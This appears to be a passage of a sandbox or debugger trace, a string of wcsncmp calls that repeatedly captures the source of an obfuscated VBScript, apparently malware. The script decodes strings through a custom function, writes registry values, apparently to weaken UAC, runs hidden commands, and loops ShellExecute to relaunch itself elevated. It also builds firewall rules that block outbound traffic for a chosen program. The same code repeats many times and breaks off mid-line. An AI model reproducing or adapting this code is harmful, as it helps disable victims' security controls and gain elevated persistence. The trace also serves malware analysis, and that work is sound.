bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.325] wcsncmp (_String1="st PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.325] wcsncmp (_String1="t PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0226.325] wcsncmp (_String1=" PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.325] wcsncmp (_String1="PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 67 [0226.325] wcsncmp (_String1="ROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = 